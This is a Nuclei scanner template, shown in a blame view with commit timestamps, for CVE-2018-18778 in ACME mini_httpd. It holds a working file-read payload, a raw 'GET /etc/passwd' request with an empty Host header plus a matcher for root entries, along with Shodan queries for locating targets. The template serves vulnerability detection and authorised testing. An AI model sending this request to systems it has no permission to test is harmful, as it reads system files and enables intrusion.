nuclei-templates/http/cves/2018/CVE-2018-18778.yaml

67 lines
1.8 KiB
YAML
Raw Normal View History

2021-02-25 16:05:18 +00:00
id: CVE-2018-18778
info:
name: ACME mini_httpd <1.30 - Local File Inclusion
2023-10-24 07:18:53 +00:00
author: DhiyaneshDK,dogasantos
severity: medium
description: ACME mini_httpd before 1.30 is vulnerable to local file inclusion.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server.
2023-09-06 12:57:14 +00:00
remediation: |
Upgrade ACME mini_httpd to version 1.30 or later to mitigate this vulnerability.
reference:
- https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/
- http://www.acme.com/software/mini_httpd/
- https://nvd.nist.gov/vuln/detail/CVE-2018-18778
- https://github.com/0xT11/CVE-POC
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2018-18778
cwe-id: CWE-200
2024-05-31 19:23:20 +00:00
epss-score: 0.39341
epss-percentile: 0.97248
2023-09-06 12:57:14 +00:00
cpe: cpe:2.3:a:acme:mini-httpd:*:*:*:*:*:*:*:*
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: acme
product: mini-httpd
shodan-query:
- 'Server: mini_httpd && 200'
- cpe:"cpe:2.3:a:acme:mini-httpd"
- "server: mini_httpd && 200"
2023-12-05 09:50:33 +00:00
tags: cve,cve2018,lfi,mini_httpd,acme
2021-03-11 16:22:34 +00:00
2024-06-11 11:25:32 +00:00
flow: http(1) && http(2)
http:
2023-10-24 07:15:22 +00:00
- method: GET
path:
- "{{BaseURL}}"
matchers:
2023-10-24 07:26:19 +00:00
- type: word
2023-10-24 07:15:22 +00:00
part: header
2023-10-24 07:26:19 +00:00
words:
- "Server: mini_httpd"
2024-06-11 11:25:32 +00:00
internal: true
2023-10-24 07:15:22 +00:00
2021-02-25 16:05:18 +00:00
- raw:
- |+
GET /etc/passwd HTTP/1.1
2021-03-11 20:16:35 +00:00
Host:
2021-02-25 16:05:18 +00:00
unsafe: true
2023-07-11 19:49:27 +00:00
2021-02-25 16:05:18 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
2024-06-11 11:25:32 +00:00
# digest: 4b0a00483046022100e849e594ed1648ce02d93bdd84f710d963ce4f68659ff9fe8fa70068bec9b6d702210091ba093250cf441932d859694d5fd95315c5a0df7f0c68f213c9cc8bfe55b9e2:922c64590222798bb761d5b6d8e72950